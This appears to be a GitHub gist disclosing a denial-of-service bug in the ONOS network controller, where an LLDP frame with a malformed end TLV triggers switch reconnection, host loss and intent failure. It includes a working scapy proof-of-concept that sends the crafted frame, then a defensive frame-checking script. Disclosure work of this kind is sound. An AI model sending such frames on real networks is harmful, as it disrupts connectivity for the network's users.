@Saber-Berserker
Last active February 25, 2025 12:23
ONOS deserialization bug

Overview

A vulnerability has been discovered in ONOS (Open Network Operating System): modifying the LLDP packet's "end TLV" field to 0200 (or another TLV type) triggers a packet deserialization problem. This issue leads to unexpected network behavior such as switch reconnections, flow table reinstallation, and re-discovery of topology and host information.

@Saber-Berserker
Author

Vulnerability Description
When processing LLDP packets, ONOS expects the end TLV field to follow a specific format. Changing this field to 0200 (or another TLV type) disrupts the deserialization process, causing the following effects:

  • Switch Disconnection/Reconnection: The affected switch disconnects from the controller and then reconnects. Links are also rediscovered.

  • Flow Table Reinstallation: The *core application reissues flow tables. (There may be more, depending on how many applications push flow tables immediately after a switch connects to the controller.)

  • Host Information Loss: All hosts under the switch connected to the malicious host disappear and need to be rediscovered.

  • Intent Failure: The intent associated with the disappearing host enters a failed state.

  • Change in Switch Communication IDs: The communication IDs of the switch and controller will change.

Steps to Reproduce

  1. Select a host under the switch as the malicious host and execute poc.py.
    The contents of poc.py:

    from scapy.all import *
    import binascii
    
    
    dstmac = "0180c200000e"
    src = "02eb607e2c6e"
    type="88cc"
    chassis = "020704000000000005"
    port= "04020232"
    ttl = "06020078"
    pn="fe12a42305014f4e4f5320446973636f76657279"
    dv="fe17a42305026f663a30303030303030303030303030303034"
    ts="fe0ca4230504" + "00000190ca847469"
    sig="fe24a42305057b8fb5f89af89bc3ecd3e454d2dbc466613ba15250c3735979a50cefad82a7fb"
    ps="080773332d65746832"
    end="0200"	# the Key Fields
    
    lldp = dstmac + src + type + chassis + port + ttl + pn + dv + ts + sig + ps
    raw_data = binascii.unhexlify(lldp)
    sendp(raw_data)
  2. Observe ONOS Behavior and Verify Network Impact: Check the ONOS controller logs for errors related to packet deserialization. Notice the switch disconnecting/reconnecting, flow tables being reissued, and topology/host information being refreshed.

Operationalization and impact

The environment for the experiment is an SDN network combining ONOS and Mininet.

Some of the images show another script that sends the packets; it works the same way as poc.py.

  • Topology transformation and logging output:

    onos deserialization bug 1 topo log

  • Host disappears:

    onos deserialization bug 2 host

  • Link disappearance, rediscovery:
    onos deserialization bug 3 link

  • Intent execution failure:
    onos deserialization bug 4 intent flow table
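
For triage on the defensive side, the following added example (not code from this gist or from ONOS) walks an LLDP frame's TLV chain and reports frames that do not terminate with a proper End of LLDPDU TLV (type 0, length 0), which is the condition described above. The function names `walk_tlvs` and `check_lldp` are hypothetical, the 7-bit type / 9-bit length header layout follows IEEE 802.1AB, and the sample frames are constructed from the header and mandatory TLVs shown in poc.py.

```python
import struct

LLDP_ETHERTYPE = 0x88CC
END, CHASSIS_ID, PORT_ID, TTL = 0, 1, 2, 3

def walk_tlvs(payload: bytes):
    """Yield (type, value) for each TLV; raise ValueError on truncation."""
    off = 0
    while off < len(payload):
        if off + 2 > len(payload):
            raise ValueError("truncated TLV header")
        (hdr,) = struct.unpack_from("!H", payload, off)
        tlv_type, length = hdr >> 9, hdr & 0x1FF  # 7-bit type, 9-bit length
        off += 2
        if off + length > len(payload):
            raise ValueError(f"TLV type {tlv_type} length {length} overruns frame")
        yield tlv_type, payload[off:off + length]
        off += length
        if tlv_type == END:
            return  # anything after End of LLDPDU is padding

def check_lldp(frame: bytes) -> list:
    """Return a list of structural problems; an empty list means well-formed."""
    if len(frame) < 14 or struct.unpack_from("!H", frame, 12)[0] != LLDP_ETHERTYPE:
        return ["not an LLDP frame"]
    try:
        tlvs = list(walk_tlvs(frame[14:]))
    except ValueError as exc:
        return [str(exc)]
    problems = []
    if [t for t, _ in tlvs[:3]] != [CHASSIS_ID, PORT_ID, TTL]:
        problems.append("mandatory Chassis ID / Port ID / TTL TLVs missing or out of order")
    if not tlvs or tlvs[-1][0] != END:
        problems.append("no End of LLDPDU TLV (type 0)")
    elif tlvs[-1][1]:
        problems.append("End of LLDPDU TLV has non-zero length")
    return problems

# Constructed sample frames: Ethernet header plus the three mandatory TLVs from poc.py.
HEAD = bytes.fromhex("0180c200000e" "02eb607e2c6e" "88cc"
                     "020704000000000005" "04020232" "06020078")
GOOD = HEAD + bytes.fromhex("0000")  # proper End of LLDPDU
BAD = HEAD + bytes.fromhex("0200")   # final TLV replaced as this page describes

if __name__ == "__main__":
    for name, frame in (("good", GOOD), ("bad", BAD)):
        print(name, check_lldp(frame))
```

The bytes 0200 decode as a zero-length Chassis ID TLV (type 1), so the frame ends without any End of LLDPDU marker and the check reports it.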
